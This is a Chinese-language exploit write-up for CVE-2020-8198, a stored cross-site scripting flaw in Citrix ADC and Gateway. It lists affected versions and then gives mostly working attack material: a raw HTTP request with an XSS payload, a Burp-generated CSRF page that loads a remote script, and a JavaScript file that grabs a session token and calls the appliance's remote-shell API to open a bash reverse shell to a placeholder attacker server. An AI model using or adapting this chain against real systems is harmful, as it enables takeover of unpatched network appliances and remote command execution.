（CVE-2020-8198）Citrix 储存型xss
=================================

一、漏洞简介
------------

要求受害者以NSIP管理员（nsroot）的身份登录

二、漏洞影响
------------

Citrix ADC and Citrix Gateway: \< 13.0-58.30

Citrix ADC and NetScaler Gateway: \< 12.1-57.18

Citrix ADC and NetScaler Gateway: \< 12.0-63.21

Citrix ADC and NetScaler Gateway: \< 11.1-64.14 

NetScaler ADC and NetScaler Gateway: \< 10.5-70.18

Citrix SD-WAN WANOP: \< 11.1.1a

Citrix SD-WAN WANOP: \< 11.0.3d

Citrix SD-WAN WANOP: \< 10.2.7

Citrix Gateway Plug-in for Linux: \<  1.0.0.137

三、复现过程
------------

    POST /menu/stapp HTTP/1.1
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Length: 96
    Content-Type: application/x-www-form-urlencoded
    X-NITRO-USER: henk

    sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert('xss')</script>&au=1&username=nsroot

### 深入利用

> csrf.html

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://www.0-sec.org/menu/stapp" method="POST">
          <input type="hidden" name="sid" value="254" />
          <input type="hidden" name="pe" value="1,2,3,4,5" />
          <input type="hidden" name="appname" value="%0a</title><script src='http://localhost:9090/code_exec.js'></script>" />
          <input type="hidden" name="au" value="1" />
          <input type="hidden" name="username" value="nsroot" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

> code\_exec.js

    function load(url, callback) {
      var xhr = new XMLHttpRequest();

      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4) {
          rand = callback(xhr.response);
          exec_command(rand);
        }
      }

      xhr.open('GET', url, true);
      xhr.send('');
    }

    function get_rand(payload) {
        var lines = payload.split("\n");
        for(var i = 0; i < lines.length; i++) {
            if (lines[i].includes('var rand = "')) {
                var rand = lines[i].split('"')[1]
                return rand;
            }
        }
    }

    function exec_command(rand) {
        url = '/rapi/remote_shell'
        command = 'bash -c \"bash -i >%26 /dev/tcp/你的服务器/16588 0>%261\"'

        var obj = {
            "params":{
                "warning":"YES"
            },
            "remote_shell":{
                "command":command,
                "prompt":">",
                "target":"shell",
                "suppress":0,
                "execute_in_partition":""
            }
        }

        var xhr = new XMLHttpRequest();
        
        xhr.onreadystatechange = function() {
            if (xhr.readyState === 4) {
                response = JSON.parse(xhr.response);
                alert(response['remote_shell']['output']);
            }
        }

        xhr.open('POST', url, true);
        xhr.setRequestHeader('rand_key', rand)
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
        xhr.send('object=' + JSON.stringify(obj));

    }

    var url = '/menu/stc';
    load(url, get_rand)

1.png